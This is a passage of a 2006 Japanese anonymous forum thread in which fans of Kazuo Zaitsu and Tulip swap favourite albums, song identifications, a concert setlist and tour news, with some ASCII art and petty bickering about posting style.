一番好きな曲はHaloに入ってる
「丘に吹く風」だったりする。
ソロの「宇宙塵」にもかなりシビれまちた。

154 :NO MUSIC NO NAME:2006/02/02(木) 23:37:10 ID:9mmDPD/a
私の好きなアルバムは、『宇宙塵』『I must be crazy』『Naked Heart』です。

155 :NO MUSIC NO NAME:2006/02/03(金) 04:38:01 ID:HvsE8mPb
財津さんも映画好きと言ってましたが、わたしも最近「カリートの道」を見ました。旧作(アルパチーノ)のほうがストーリーがよかったです。以上!

156 :NO MUSIC NO NAME:2006/02/03(金) 04:49:45 ID:8kTDT8z4
やめて〜チョウダイ!!

157 :NO MUSIC NO NAME:2006/02/08(水) 17:44:07 ID:++aRf3em
CANCIONの歌う「青春の影」良いですね♪
名曲は永く歌い継がれて行くのですね。

158 :NO MUSIC NO NAME:2006/02/09(木) 20:57:11 ID:dB25hj7X
福山雅治の「青春の影」もいいなあ
最近 福山って歌うまいね。
財津さんも福山に歌ってもらえて嬉しいだろうに。

159 :NO MUSIC NO NAME:2006/02/14(火) 14:45:21 ID:NI4/+oqk
よく流れてる曲なんだけど多分この人の声
きみここころえつづくながいいっぽんみちはってなんて曲?
償いの日々はラジオで偶然聞いてちょー感動した

160 :NO MUSIC NO NAME:2006/02/14(火) 15:54:51 ID:wxmCYbsr
>>159
「青春の影」

日本のポップスの名曲のひとつ

161 :NO MUSIC NO NAME:2006/02/14(火) 16:23:13 ID:NI4/+oqk
とんとん。

162 :NO MUSIC NO NAME:2006/02/15(水) 12:18:08 ID:rQrBiW/F
今年に予定していた、TULIPのツア-は中止になりました。
35周年に向けてオリジナルアルバム作りに専念するそうです。
ざんねん。

163 :NO MUSIC NO NAME:2006/02/15(水) 13:33:21 ID:+YxxIUDB
ええ曲いっぱい作ってー!お願い期待大!

164 :NO MUSIC NO NAME:2006/02/15(水) 14:26:45 ID:t8wn2FsD
財津さん、体調に気をつけてアルバム製作がんばってほしいです。

165 :NO MUSIC NO NAME:2006/02/15(水) 17:06:37 ID:rQrBiW/F
someday,somewhere、のような2枚組みのオリジナルアルバム
を作ってほしいな。


166 :NO MUSIC NO NAME:2006/02/15(水) 18:03:00 ID:t8wn2FsD
新オリジナルアルバムツアーは2007年?待ち遠しいなぁ。
それまでに生歌聴きたい。

167 :NO MUSIC NO NAME:2006/02/16(木) 10:18:37 ID:ucRxnYFR
財津ソングて『ONE WORD』あたりから歌い方も曲のイメージも変わってきたように
思うのだけど気のせい?

声は95年くらいから変わってきてる気がする。


168 :NO MUSIC NO NAME:2006/02/16(木) 12:26:09 ID:67FeQuWI
ONE WORDなんてここを見てる人間の何人が聞いてるんだ?
誰もいないんじゃないか?

169 :NO MUSIC NO NAME:2006/02/16(木) 18:28:48 ID:gibrMBIe
>>168
ここは財津和夫スレだよ

170 :NO MUSIC NO NAME:2006/02/16(木) 23:29:21 ID:kPvCgwFm
多数のアーティストに影響をあたえた過去の傑作アルバムを上回る曲をお願いします!

171 :NO MUSIC NO NAME:2006/02/17(金) 08:42:55 ID:1lobiI+6
ソロアルバムの中では、「愛はちっとも難かしくない」が好きですね〜。
95年のです。ゼファ-クラブが20周年なんで、何かするらしいですよ。

172 :NO MUSIC NO NAME:2006/02/17(金) 09:33:18 ID:jH9lmt8n
何かって何? 『The宴会』かな。

173 :NO MUSIC NO NAME:2006/02/18(土) 18:06:57 ID:vcrz9Hqm
オリジナルアルバムがもう5年くらい出ていませんね。

174 :NO MUSIC NO NAME:2006/02/19(日) 00:34:50 ID:KbwdKroj
今日は財津さんのお誕生日。58歳おめでとうございます。

175 :NO MUSIC NO NAME:2006/02/19(日) 07:06:56 ID:D66jdbLL
58歳おめでとう!おめでとう!
2枚目のライブアルバムで(赤いジャケットの)70歳のおじいさんになっても
こうやって5人がステ-ジに立っていられれば、最高です、つうような事を
言ってたような気がします。あと12年是非頑張ってほしいです。
(ベ−スは宮城さんに代っていますが)そんな事はどうでもいいですね!


176 :NO MUSIC NO NAME:2006/02/19(日) 10:16:54 ID:VVXJdxRE
誕生日おめでとう!財津さんファンのためにいつまでも頑張ってください!ニューアルバムできたら買いにいきます!

177 :NO MUSIC NO NAME:2006/02/19(日) 11:12:08 ID:c0qh6ICs
財津さん お誕生日おめでとー。
いい感じに年取ったよね。 その調子で70才目指せー!!


いや100才でもいいんだけど。

178 :NO MUSIC NO NAME:2006/02/22(水) 19:48:27 ID:IqjA0lQI
ゼファークラブは何をするの?個人的には財津さんの活動やファンとのふれあいを映したドキュメントビデオが発売されたら買います!

179 :NO MUSIC NO NAME:2006/02/22(水) 20:18:40 ID:DdfP5KIe
>>178
ファンとのふれあい映像 = 黒さんたちいっぱい登場w

180 :NO MUSIC NO NAME:2006/03/04(土) 19:28:38 ID:bjpDbLhH
あげ

181 :NO MUSIC NO NAME:2006/03/07(火) 12:28:06 ID://i2FuOh
昔、今井美樹主演の「思い出に変わるまで」に出てたね。
「ひとつ屋根の下」の主題歌はサボテンの花だった。
そして朝日新聞に連載コラム書いてたね。
娘さんの育児がこんなに楽しいなんて見たいな事書いてた気がする。
何気なく読んでたけど、その後財津さんの曲がすきになったのでもっとしっかり読んどきゃあ良かったって思った記憶がある。
今は他のアーティストが好きな移り気人間なのであまり聴かなくなったけど、やっぱりTVにでたりすると観るよー。


182 :NO MUSIC NO NAME:2006/03/08(水) 06:18:20 ID:EtEUtfQb
財津さんは息子だけでなく娘もいるんだ?音楽ファミリーなのが目に浮かびそう。いいなぁ。。。

183 :NO MUSIC NO NAME:2006/03/08(水) 11:08:14 ID:QDf1jS0T
>>182
ほんわかファミリーを想像しているなら・・・・ry

184 :NO MUSIC NO NAME:2006/03/08(水) 18:47:01 ID:EtEUtfQb
ほんわかでないってこと?違うのかなぁ・・イメージ的には皆頭が良くて礼儀正しく音楽を愛する家族って感じ。みなさんニューアルバム期待しましょう!

185 :NO MUSIC NO NAME:2006/03/20(月) 21:28:28 ID:JIV0+d1l
財津和夫の人生ゲーム三十分は短いよねー!いつかまた、一時間にもどってほしい!

186 :NO MUSIC NO NAME:2006/03/22(水) 22:50:17 ID:quyR8DJy
人気番組なのにねー

187 :NO MUSIC NO NAME:2006/04/02(日) 00:32:35 ID:3pClvjjl
ちょっと前のTBSの朝ワイドの英会話コーナー(道行く人にしゃべらせる)で
クロード・チアリの娘にとっつかまったときに芸能人オーラを極限まで薄めつつ
脱力系の受け答えをしていた和夫タン萌え〜

(その番組で、本当に財津氏だったか否か確かめてもいたが)

188 :NO MUSIC NO NAME:2006/04/04(火) 08:39:13 ID:kdM/2sKO
女性ファッション紙STORYに財妻が載ってるよ。
まさに、勝者って感じ。

189 :NO MUSIC NO NAME:2006/04/04(火) 21:15:41 ID:bPX+IKFI
その番組みたかったゎー!その雑誌まだ売ってますよねー?

190 :NO MUSIC NO NAME:2006/04/05(水) 11:36:59 ID:/1eEonaI
わー懐かしい!!財津さんのスレがあるー
ハワイへ行ったなー・・・高校生だったあの頃

191 :NO MUSIC NO NAME:2006/04/06(木) 12:08:56 ID:CJl+C73A
財津よ、キミはわがままなボクの為に〜♪

192 :NO MUSIC NO NAME:2006/04/08(土) 12:21:34 ID:y7zgkId3
>>187
それ見たw
すげぇ市井(しせい)に同化してたから、余計におかしかった

193 :NO MUSIC NO NAME:2006/04/08(土) 18:35:07 ID:EuROKCQ+
みたかったー!財津さんってなんとも楽しい人でユーモラスで想像つきそう・・

194 :NO MUSIC NO NAME:2006/04/08(土) 18:43:16 ID:EuROKCQ+
財津さんが今日ラジオで「レコーディングにむけてメンバーと打ち合わせをしている」っと言っていました。もうすぐかー・・・期待してます!新作発売したらみなさん買いましょう。

195 :NO MUSIC NO NAME:2006/04/08(土) 21:54:25 ID:os9ymw/f
>>194
まだまだじゃない?

196 :NO MUSIC NO NAME:2006/04/09(日) 10:56:55 ID:5IJd98Kp
避難所はここですか?

197 :NO MUSIC NO NAME:2006/04/09(日) 19:38:14 ID:h/YUzzsx
STORY見ました。財津婦人初めて見ました。感激です!知的で美人で何もかも満たされてるって感じでした。 二人で写っている写真から明るい家庭と前向きな姿勢がうかがえるような気がしました。実に良い夫婦でした。

198 :NO MUSIC NO NAME:2006/04/10(月) 09:59:01 ID:jyfQR9jZ
そんな恐ろしいまでのマンセー意見、初めて見たよ。
あっちの板でそんなカキコしたら袋だたき状態だろうね。
ご本人降臨〜とかあんた何様?とか。
自分は興味ないけど。

あと、改行してくれる?見づらいんだよ

199 :NO MUSIC NO NAME:2006/04/10(月) 12:20:34 ID:BA5jRam7
見づらいなら見るなよ。

200 :NO MUSIC NO NAME:2006/04/10(月) 12:59:17 ID:m+5bNCuL
ニューアルバムどんなサウンドなのかなぁ。 個人的にはアコースッティク系より少しロックぽくしてほしい。安部さんのSGも復活してほしいなあ!

201 :NO MUSIC NO NAME:2006/04/12(水) 11:02:03 ID:NrGNd1m4
そうですねー。どのようなサウンドなんですかね〜・・・。それもまた楽しみのひとつですっ。今までになかった音も聞いてみたいし、まぁ待ちましょう!

202 :NO MUSIC NO NAME:2006/04/12(水) 11:03:44 ID:NrGNd1m4
そうですね。そうしましょう!

203 :NO MUSIC NO NAME:2006/04/12(水) 12:16:36 ID:fzijDrRZ
終了

204 :NO MUSIC NO NAME:2006/04/12(水) 15:37:02 ID:6XYY9f93
ここのスレっていつも改行もしないで
「買います!買いましょう!」って言ってる人の独壇場のようですね。
それにしても自作自演って
見せられるこっちが恥ずかしくなります。
さようなら。

205 :NO MUSIC NO NAME:2006/04/12(水) 21:36:07 ID:c/Hgp57B
「青春の影」 姫野が歌ってれば、大ヒットだったね!
財津が歌ったおかげで、裏の名曲に成り下ったwww


206 :NO MUSIC NO NAME:2006/04/13(木) 15:41:03 ID:odHqVKjR
最近のライブは音が小さいね。 昔のようにバスドラがズンズン体に響いてくるくらい大きくしてほしいっす!

207 :NO MUSIC NO NAME:2006/04/13(木) 15:47:18 ID:odHqVKjR
名曲「青春の影」は財津さんでしょう。姫野には「心の中は白い画用紙」があります・・

208 :NO MUSIC NO NAME:2006/04/13(木) 19:58:33 ID:24ab+2XO
>>206

あなたの耳が老化してるから小さく聴こえるんですよ。

209 :NO MUSIC NO NAME:2006/04/13(木) 20:39:37 ID:odHqVKjR
いや、昔はHRなみの
大きさだったよ。
解散してからも何
度かライブに行っ
たがアマのPA波〜
!ライブの後半に
シンセとディスト
ーションのきいた
Gで会場ももりあ
がってきたけど・・
レンタルビデオと映
画館、どちらが感動
しますか?人それぞれ
だけど

210 :NO MUSIC NO NAME:2006/04/13(木) 23:27:32 ID:PVfV1u8K
何かスレの雰囲気が変わってきたね。


211 :NO MUSIC NO NAME:2006/04/14(金) 01:11:13 ID:0s11p6kL
松任谷由美・小田和正・財津和夫の「今だから」の音源を探してます。

誰かうpお願い。

212 :NO MUSIC NO NAME:2006/04/14(金) 08:09:10 ID:27/q2Pjz
>>211
人生ゲームにリクエストしてみたら?

213 :NO MUSIC NO NAME:2006/04/14(金) 22:57:14 ID:iZVh1hmn
盛り上がってまいりましたWWW・・

214 :NO MUSIC NO NAME:2006/04/16(日) 23:25:58 ID:JDT1EITY
すみません、どなたか曲名を教えてください。

♪ もうずっとずっと 会っていないよ 本当の自分に

この一節を含む曲名はなんでしょうか?随分昔のラジオで聴いた曲です。
財津さん自身のラジオ番組でした。

215 :NO MUSIC NO NAME:2006/04/17(月) 18:45:07 ID:Ny0Spdsl
わかりません!どなたかわかる人いますかあああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああー

216 :NO MUSIC NO NAME:2006/04/18(火) 00:24:47 ID:xs5rS95Q
財津さんの歌なん?

もう少し書いて。  っていっても分からんけど。。

217 :NO MUSIC NO NAME:2006/04/18(火) 10:21:23 ID:wWs1XnkE
マジレスすると、ラジオ番組(素敵な夜だから)用のテーマ曲。
CD化されていない。

218 :214:2006/04/18(火) 13:55:50 ID:rTPpBcOJ
>>217 
そうですそうです、「素敵な夜だから」でした!

>CD化されていない。
えー、そうなんですか?凄くいい曲なのにぃ〜 じゃあ聴けないということかー


219 :NO MUSIC NO NAME:2006/04/18(火) 19:48:36 ID:GCC2c8a3
隠れた名曲がまたひとつ・・・あらためて氏の偉大さに気付きました。

220 :NO MUSIC NO NAME:2006/04/19(水) 07:16:14 ID:M88mK+yi
そうですね。わたしもそう思います。

221 :NO MUSIC NO NAME:2006/04/20(木) 20:53:30 ID:4B4vfy51
いつごろの曲なの?

222 :NO MUSIC NO NAME:2006/04/20(木) 23:02:49 ID:BoQIMSrh
>>214
もうちょっと書いてよ

223 :NO MUSIC NO NAME:2006/04/21(金) 01:32:53 ID:oSHEVo1F
>>214

♪どうして夢の中では、こんなに優しく抱いてくれるの

 悲しい曲をなぜか選んでしまう、こんな時なのに

 もうずっとずっと会っていないよ、本物の君の唇に

 もうずっとずっと会っていないよ、本物の白い腕に


記憶をたどると確かこんな歌詞だったと…
違ってたらスマソ

でもぜひCD化してほしいっす






224 :NO MUSIC NO NAME:2006/04/21(金) 23:12:36 ID:nl/1fE2p
>>211
ネットオークションで簡単に見つかる。

225 :NO MUSIC NO NAME:2006/04/21(金) 23:15:36 ID:aMX9WSQ5
>>214
約15年前の曲です。当時の私の心境を表現した歌詞でした。
この曲は、財津さんの美しい声にせつないピアノの伴奏がマッチして、多感だった私には強く印象に残っているのです。

>>223
詳しく教えていただき、ありがとうございます。
確かにおっしゃるとおり、冒頭が ♪どうして〜 でした。
ただ、最後の部分は ♪本当の自分に だった気がします。勘違いならすみません。

どなたか音源くださーい!

226 :NO MUSIC NO NAME:2006/04/22(土) 00:39:09 ID:9K3BDqgQ
語りません。

227 :NO MUSIC NO NAME:2006/04/22(土) 18:38:37 ID:K2+vwJpi
まだ発表してない曲とかもあるんだろうか?あるとしたら聞きたいなあ!

228 :NO MUSIC NO NAME:2006/04/26(水) 03:13:54 ID:oAATyOEl
この頃の財津は神だった。
http://www.youtube.com/watch?v=f9ytVfn0Z8k

229 :NO MUSIC NO NAME:2006/04/26(水) 06:48:44 ID:B8wI3hXQ
>>228
大変貴重なものをありがとう。

よくみつけたねえ。

230 :NO MUSIC NO NAME:2006/04/26(水) 22:54:57 ID:oLWGBPrA
     /           ヽ
    │彳丿丿丿人人人
    .| 」   /' '\  |
    ,r-/   -・=-, 、-・=- |
    l       ノ( 、_, )ヽ  | < ぼく、映ってないね・・・
    ー'    ノ、__!!_,.、  |
     ∧     ヽニニソ   l
   /\ヽ           /
 /     ヽ.  `ー--一' ノ/ヽ




231 :NO MUSIC NO NAME:2006/04/27(木) 01:35:43 ID:uyk3KLcz
>>230
私もあなたの姿が見えないわ、と思いました。

232 :NO MUSIC NO NAME:2006/04/27(木) 01:37:57 ID:uyk3KLcz
あ、ちょっと >>230 ここは財津和夫さんのスレですよ!!

233 :NO MUSIC NO NAME:2006/04/27(木) 01:47:22 ID:/Nt4nfOJ
>>228
1976年放送のニューミュージックスペシャルですね

この回は他に『あの娘は魔法使い』『風のメロディ』などを演ってます。




234 :NO MUSIC NO NAME:2006/04/27(木) 21:01:08 ID:FGNE+gsk

     /           ヽ
    │彳丿丿丿人人人
    .| 」   /' '\  |
    ,r-/   -・=-, 、-・=- |
    l       ノ( 、_, )ヽ  | < ぼくのスレもつくってよ・・・
    ー'    ノ、__!!_,.、  |
     ∧     ヽニニソ   l
   /\ヽ           /
 /     ヽ.  `ー--一' ノ/ヽ


235 :NO MUSIC NO NAME:2006/04/27(木) 21:14:49 ID:3nofliWF
                  ,、‐'"´^`"'ヽ、
                 /   _,l    ヽ,'
                l´,   /--‐ヽ    l
                 l l  _l二ニユ___.」
                l,イ - 、    ,ィく l,^j
                {ヽ:! f:.jヽ  .「j ' ly'
                /ヘ、.     l   l
                 ,rくヽ、.ヽ_ フ ,/
               /-、   ヽ‐-r'´   ピザでも食ってろデブ!!
              /-‐ 、   `"'´ヽ
              /'´    ヽ、   ヽ
             /'´ ̄ヽ、   l     l
             l     ハ、 l     l
            /    / ヽ、l     l l
            /   ;! l、__,y'      l|
           /      l  /      l
           l       .l /         l
            l       l'          l
           l   _____l         l
      __、、-‐''"´ ̄ ̄___ ̄"'' ‐-、、、_ l
   ,、-‐'" 、、__,,、-、'";;;;;;{、-、__く;;;;;"7 ‐-、、,,  "'ヽ、
,、 '" 、_,,、-'";:;;{、 r-';;;f´ '-、;;;;;(_,,ノ;;;;;;;;;;;;;;;;/'^ヽ、 .ヽ、
  r'"  _/;;;;;;;;;;;;"';;;;;;O;;ヾ-';;;;;;;;;;;;;;;;;;;;ィ-、;;;ヽr、__ヽ、: ヽ、
 / r';;;;;;;;;;;;;;;;::::、^ヽ__ノ;;;;;;;;;;;;;;;:::::::::;;;;;;;;;;ト-、'-、;;;;;:;ニ;;ト、 '、
/;;;;;;;;;;;;ゝ'ヽ;;;;;;;ー';;;;;r、;;;;;;;;;;;::::::::';;r'~ヾ;;;;;c;;;;;;;;;;;;;;;`'";;;;;;;l   l


236 :NO MUSIC NO NAME:2006/04/28(金) 00:14:39 ID:x2oVENnx
>>234
あなたのスレは荒れるから無理です。

237 :NO MUSIC NO NAME:2006/04/28(金) 10:48:54 ID:ET9s8tua
「ぼくがつくった愛のうた」が好きでカラオケのたびに歌うのだけど
全然受けない。下手に歌ってるせいもあるけど悲しい。これ名曲ですよね。

238 :NO MUSIC NO NAME:2006/04/29(土) 00:49:48 ID:onELfD7b
受けねらいはしちゃだめ。

239 :NO MUSIC NO NAME:2006/05/01(月) 23:00:19 ID:XLcJJhiw
237>
とても一人では歌えません。名曲だけどカラオケ向きじゃないよね。
俺は20年以上前入社早々に六本木のスナックで歌った「愛の迷路」
が意外と好評だったのを今でも鮮明に覚えてる。

240 :NO MUSIC NO NAME:2006/05/02(火) 12:22:29 ID:a+4EbqZD
『あの娘は魔法使い』を思いっきりカラオケで歌ってみたい。


でも友達いないの・・・。誰か一緒に歌ってくれる人いない?

241 :NO MUSIC NO NAME:2006/05/02(火) 23:51:52 ID:dkZPx5wz
チューリップという枠を除けると
自分にとって思い出深いのは
「I need you and you」
だな。

242 :NO MUSIC NO NAME:2006/05/03(水) 00:12:33 ID:ljxGOq8Z
>>241
どんな思い出?

243 :NO MUSIC NO NAME:2006/05/03(水) 00:52:23 ID:wlR8UqVX
絵の具全色混ぜて真っ黒にしたとか?

244 :NO MUSIC NO NAME:2006/05/03(水) 10:54:49 ID:KycvrnS+
>>243
やったことある。。

245 :NO MUSIC NO NAME:2006/05/03(水) 22:19:24 ID:WxUVuD6h
あと、酒のプールで泳いだりとか…。

246 :NO MUSIC NO NAME:2006/05/04(木) 08:37:48 ID:qmjkOpa1
>>245
あるある。。。。

247 :NO MUSIC NO NAME:2006/05/04(木) 20:57:06 ID:owHNN4JM
塩沢トキのような髪にしたとか…


248 :NO MUSIC NO NAME:2006/05/05(金) 23:22:27 ID:1FyA6k0P
>>247
それはないな。。

249 :NO MUSIC NO NAME:2006/05/05(金) 23:46:10 ID:Fr+1NmF3
ナイフとフォークで溜息を切ったんだな。

250 :NO MUSIC NO NAME:2006/05/06(土) 07:47:40 ID:6fpflSNP

今日のメニューは “ 溜息 ”            ・・かよ。    



251 :NO MUSIC NO NAME:2006/05/08(月) 20:11:35 ID:lcQOc2EA
さあて、今夜の夕飯は溜息だ!!

252 :NO MUSIC NO NAME:2006/05/10(水) 00:19:19 ID:fZm7qjln
僕の針が、君のレコードに…

253 :NO MUSIC NO NAME:2006/05/10(水) 07:33:46 ID:kJev/SfV
おちれば体にあふれるハーモニー(ハーモニー)


エロエロ〜!

254 :NO MUSIC NO NAME:2006/05/10(水) 17:04:06 ID:+M5aYaJG
ばかじゃないの? そんなこと想像するのは男しかいないのよ!!

255 :NO MUSIC NO NAME:2006/05/10(水) 18:10:19 ID:WFrPf6RB
おばちゃん 何でそんなに必死なの?

256 :NO MUSIC NO NAME:2006/05/10(水) 22:50:01 ID:bG6YOV6h
頭の中は十代で思考停止で蜘蛛の巣貼ったまま更年期を迎えたババアだと思われ。


257 :NO MUSIC NO NAME:2006/05/11(木) 00:31:13 ID:RYJTZ8vP
財津さんの書く詞って、けっこうセクシャルなのを想起させられるフレーズあるんだけどね
月刊カドカワでエロ小説書いてた時期もあったしw

258 :NO MUSIC NO NAME:2006/05/11(木) 01:24:52 ID:bT37IreX
別れ話にフルーツパーラーは似合わない。

259 :NO MUSIC NO NAME:2006/05/17(水) 01:44:07 ID:tFjVc7eD
>>252-253
あー最近愛出してねぇな――

260 :NO MUSIC NO NAME:2006/05/20(土) 14:30:32 ID:p75BZYJ/
愛なんてあげましょ、いくらでも♪ 


って歌なかった?

261 :しっこ:2006/05/21(日) 13:39:43 ID:+PTtUpXI
1000回記念コ
ンサートにいきた
かった。よみうり
ランド貸切でいろ
いろ乗り放題やア
マチュアバンド、
鼓笛隊、写真展、
アルバムジャケッ
トのセットで記念
撮影できたりで楽
しめて、開始前に
セスナ機まで飛ば
し。舞台はスモー
クはもちろん10
00個のライトで
演出し、さらに花
火、レーザーなど
の大掛かりな装置
で見応え十分・・
・らしいです。誰
かそのへん詳しい
人OR行った人教え
て!たのむ!

262 :NO MUSIC NO NAME:2006/05/21(日) 19:48:23 ID:d42DezGh
>261
縦読みしちまったじゃねぇか
紛らわしい改行すなボケ

263 :NO MUSIC NO NAME:2006/05/22(月) 00:07:47 ID:6iTIw72p
改行しろって言われたからじゃないの?

これ携帯から?

264 :NO MUSIC NO NAME:2006/05/22(月) 15:34:31 ID:oEgExOS7
千回記念コンサート詳しい人教えて!どんなかんじだった?

265 :NO MUSIC NO NAME:2006/05/22(月) 23:44:05 ID:m+sCeyEf
>>264
八月も半ばに差し掛かると日の短さや夜風に夏の終わりを感じるものがあるんだが
そんな中野外で聴く「風のメロディ」は格別だったね。
日中はプールで遊んだんでイベントブースには行ってない。

THE LOVE MAP SHOP
アフリカは午後0時
置いてきた日々
夏に別れを
SILENT LOVE
BLUE EYES
--- 生ギター・コーナー ---
そんな時
木馬
バッハ練習曲
悪魔の子守歌
----------------------------
美しい星(SE)〜2222年ピクニック
I am the Editor
虹とスニーカーの頃
めぐり逢いは想い出
風のメロディ
博多っ子純情
あした天気になれ
日曜日の風景画
We Can Fly
VOLUME 10
さよなら道化者
生まれる星
Shooting Star
光の輪〜アルバトロス(SE)
--- encore ---
私のアイドル
歌は生きている
夢中さ君に
--- encore ---
魔法の黄色い靴
--- encore ---
青春の影
2222年ピクニック


266 :NO MUSIC NO NAME:2006/05/23(火) 00:39:44 ID:hScGFDFS
ビミョ〜にスレ違いっぽいが・・・どこも荒れてるしなぁ
>>265
あんた親切杉。
ここのスレってなんで改行ヘンなのとかageたりするヤツばっかりなん?
メル欄もメチャクチャだし。

267 :NO MUSIC NO NAME:2006/05/23(火) 01:49:19 ID:PZRqiTrg
>266
つ初心者

268 :NO MUSIC NO NAME:2006/05/23(火) 08:15:13 ID:gFLiB8Sx
>>266
ごめん
ageはわざと。


269 :NO MUSIC NO NAME:2006/05/24(水) 20:29:59 ID:ohxhn1tj
1000回のライブテープ持ってたけど凄い歓声だったなあ。

270 :NO MUSIC NO NAME:2006/05/25(木) 22:46:47 ID:fyT1ID+n
265 ありがとう
。アルバムとは微
妙に曲順違うみた
いですが、かなり
いい選曲ばかりで
CDで全曲聞けな
いのが残念!でも
コンサートに行け
た人は最高の思い
出になっただろう
なぁ。詳しい人い
たらまた教えてネ!

271 :NO MUSIC NO NAME:2006/05/25(木) 22:52:38 ID:fyT1ID+n
あした天気になれ We Can Fly さよなら道化者 はアルバムに入れてほしかった!

272 :NO MUSIC NO NAME:2006/05/26(金) 12:16:22 ID:FNvLJIul
レコードは片面の収録時間の関係で曲順が入れ替わったりしたからねえ。
せっかくCDの時代になったんだから完全版を出せばいいのにねえ。

273 :NO MUSIC NO NAME:2006/05/26(金) 14:09:30 ID:Jx8g1cuK
ここも投下
http://news18.2ch.net/test/read.cgi?bbs=mnewsplus&key=1148619085

274 :NO MUSIC NO NAME:2006/05/26(金) 14:15:16 ID:uN6KjBa/
財津さんの事務所に空き巣が入ったって。
http://headlines.yahoo.co.jp/hl?a=20060526-00000207-yom-soci

275 :NO MUSIC NO NAME:2006/05/26(金) 23:11:18 ID:YIwl+Q5m
DVDで見れたら
もっといいざます。。。
泥棒???残念な
ニュースです・・

276 :NO MUSIC NO NAME:2006/05/28(日) 12:40:50 ID:cHXFnpnM
財津さん、好きです。奥様の写真見たいな。
来年のツアー、楽しみだけど正直新曲より懐かしい曲をいっぱい聴きたい。
ファン失格ですかね。

若いときは財津さん一筋でしたが、ツアーに行って上田さん大好きになり
ました。しぶ〜いおじさんになったなぁ。かっこいい。
財津スレでした。失礼。

277 :NO MUSIC NO NAME:2006/05/29(月) 08:51:40 ID:cbvStr+W
上田さん かっこいいよ!
もちろん 財津さんも!

278 :NO MUSIC NO NAME:2006/05/29(月) 19:28:35 ID:KFHXmt+G

     /           ヽ
    │彳丿丿丿人人人
    .| 」   /' '\  |
    ,r-/   -・=-, 、-・=- |
    l       ノ( 、_, )ヽ  | < 277さん ぼくは?・・・
    ー'    ノ、__!!_,.、  |
     ∧     ヽニニソ   l
   /\ヽ           /
 /     ヽ.  `ー--一' ノ/ヽ


279 :NO MUSIC NO NAME:2006/05/29(月) 22:17:35 ID:vOu1nTZs
残念なニュースが
ありましたが、新
曲楽しみに待ちま
しょう。

280 :NO MUSIC NO NAME:2006/05/30(火) 11:49:42 ID:OwJjyJwc
Tulipメンバーは全員かっこいい!!

281 :NO MUSIC NO NAME:2006/05/31(水) 20:25:13 ID:MwrlK0Ty
第二期に近いサウンドで新曲作ってー!

282 :NO MUSIC NO NAME:2006/06/02(金) 20:48:08 ID:p0xPKSQA
281さん、ガリでなくかおるじゃないと無理です。  かずお

283 :NO MUSIC NO NAME:2006/06/03(土) 03:28:54 ID:az0NrIwM
かずおさん?財津
さん?じゃないよ
ねぇ〜!?ガリっ
て上田さん?上田
さんのセンスとテ
クニックに凄いな
ぁとよく思いまし
た。が、かおるさ
んの胸まで響くパ
ワフルさもよかっ
たな〜。



284 :NO MUSIC NO NAME:2006/06/03(土) 03:40:05 ID:az0NrIwM
276さん、財奥
顔は永作博美に市
毛良枝をたして2
で割ったかんじの
チャーミングで気
品のあるかんじデ
ズ。雑誌でみたした

285 :NO MUSIC NO NAME:2006/06/03(土) 09:34:13 ID:i0rFZeCL
なんだ?このキモいスレ

286 :NO MUSIC NO NAME:2006/06/03(土) 10:03:48 ID:WCADF51w
携帯ババヲタは改行位置をちゃんと考えろ。
読みづれーんだよ。

287 :NO MUSIC NO NAME:2006/06/03(土) 21:32:46 ID:QJxm+r9P
>>284
美人ていうよりも、癒し系な感じでしょうか?


288 :NO MUSIC NO NAME:2006/06/03(土) 21:54:26 ID:NNNhhfry
チャーミングで気
品のあるかんじデ
ズ。雑誌でみたした

気品のあるかんじデズ。デズデズデズ…
雑誌でみたした。みたしたみたしたみたしたみたし……

289 :NO MUSIC NO NAME:2006/06/04(日) 00:33:14 ID:7NZW+ogd
>>288
すごいな、おまいのIDww

290 :NO MUSIC NO NAME:2006/06/04(日) 17:42:28 ID:gvlmeKof
>>289
すごいでしょ。なんか嬉しい。レアだねレアww

291 :NO MUSIC NO NAME:2006/06/04(日) 18:50:58 ID:VGtu0Tld
287、癒し系でありさわやかな気品のあるとても良い夫人としか言えません。あのお方は。

292 :NO MUSIC NO NAME:2006/06/04(日) 19:36:30 ID:kgw3GJAW
今だからA面は持ってるけど、B面の方持ってない。
一度聴いてみたい。

293 :NO MUSIC NO NAME:2006/06/04(日) 20:34:33 ID:6Zqxd8TO
>>292
A面だけ持ってるってどういう事?

294 :NO MUSIC NO NAME:2006/06/04(日) 21:22:32 ID:xf3Bq4On
違法なmp3のコピーを持ってるんでしょw

295 :NO MUSIC NO NAME:2006/06/05(月) 15:49:53 ID:BuPV7ooL
>>284
>>287
>>291
そういうカキコはぜひこっちのスレでおねがいします
http://bubble4.2ch.net/test/read.cgi/natsumeloj/1147680920/

296 :NO MUSIC NO NAME:2006/06/11(日) 17:17:24 ID:cRbDDSTB
和夫と一郎

297 :NO MUSIC NO NAME:2006/06/12(月) 21:25:03 ID:NKvvbJBa
みなさんの好きなアルバムはなあに〜?

298 :NO MUSIC NO NAME:2006/06/13(火) 00:06:56 ID:YGClRWT9
I must be crazy

299 :NO MUSIC NO NAME:2006/06/13(火) 20:04:42 ID:GZubs44r
宇宙塵

300 :NO MUSIC NO NAME:2006/06/13(火) 21:07:13 ID:lFdCUbuD
ソロじゃないけど10th ODESSEY

301 :NO MUSIC NO NAME:2006/06/13(火) 23:26:54 ID:uyiJqgea
I must be crazy  「君の指」

302 :NO MUSIC NO NAME:2006/06/14(水) 02:52:27 ID:W1NWvAxB
2222

303 :NO MUSIC NO NAME:2006/06/14(水) 08:37:35 ID:vbMYPjKy
ファンクラブのイベント(トーク&ライブ)が8000円な件

304 :NO MUSIC NO NAME:2006/06/14(水) 12:14:52 ID:gvza0F7a

金儲けと思えて仕方がない。
前回、行くヤツなんているかよと思っていたら、結構いたらしい。
東京は平日。それでも集まるんだろうね。

305 :NO MUSIC NO NAME:2006/06/14(水) 12:19:32 ID:YEJkugpa
>>304
金儲けの何処がいけないんだ?アフォ?

306 :NO MUSIC NO NAME:2006/06/14(水) 15:39:11 ID:gvza0F7a
 / ̄ ̄ ̄`⌒\
      /          ヽ   
      |  _,___人_   |             
      ヽ|´ ┏━ ━┓`i /        
        |  《・》 《・》  | >>305
       (6|   ,(、_,)、  |6)                
   , ―-、  ヽ  トェェェイ  /             
   | -⊂)  _ヽ ヽニソ /_         
    | ̄ ̄|/   `ー一' 、 \       
    ヽ  ` ,.|       |  |   
      `− ´ |       | _

307 :NO MUSIC NO NAME:2006/06/14(水) 17:56:37 ID:/EatlC21
ふ〜ん

308 :座逸:2006/06/14(水) 18:36:17 ID:g1t3OCXh
